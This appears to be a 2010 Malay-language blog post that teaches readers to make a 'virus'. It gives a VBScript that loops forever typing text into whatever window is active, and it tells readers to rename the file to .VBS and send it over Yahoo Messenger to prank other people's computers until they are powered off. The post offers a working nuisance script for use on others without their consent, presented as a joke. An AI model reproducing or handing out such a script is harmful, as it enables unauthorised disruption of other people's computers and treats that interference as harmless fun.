Sign In | Manage Account | Gmail

Mari Belajar Buat Virus Sendiri

February 11, 2010 ·
Assalammualaikum..
OK..tin nak ajar korang trick nak pedajal CPU/laptop sesapa je la..
Tapi trick kali nih korang kena betul2 berhati2..
Tengok sama kat orang yang korang nak bergurau tu..
Kang tak pasal2 kena penerajang ala2 jetli atau berus gigi..
OK!!!jom kita belajar trick nih..
Trik nih tersangat la senang sangat2..trik2 nih sebenarnya korang leh hantar melalui YM atau apa saja ler..huhuhu..

Trik nih akan menjadikan CPU/Laptop yang terkena akan menjadi gila selama mana CPU/Laptop tu ON..cara nya korang kena OFF jela CPU/Laptop tersebut..trik nih agak berbahaya..so jangan memain ngan trik nih ok!!!

Korang masukkan kod dibawah nih di dalam notepad dan tukarkan file dari .TXT ke .VBS ok..

Kod:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Virus Tin Kosong."
loop


Pastu korang leh hantar melalui YM dan diorang akan terkena terus virus nih..sebenarnya trik nih serupa semacam dan sama jer dengan Trick Bang2 Boom CPU/Laptop Orang (EP.1) dan Trick Bang2 Boom CPU/Laptop Orang (EP.2) yang dimana korang leh hantar melalui YM..banya rasia lagi dalam trik nih..so kena bertanya baru akan faham ngan kod nih..
SO!!!SELAMAT MENCUBA!!!!!

1 komen:

Ghun said...
March 23, 2011 at 7:32 PM  

pe khbar?? siht??

Followers

Feed Burner

Sila click komputer berlari yer

atau masukkan emel korang untuk software dan trik menarik:

Delivered by FeedBurner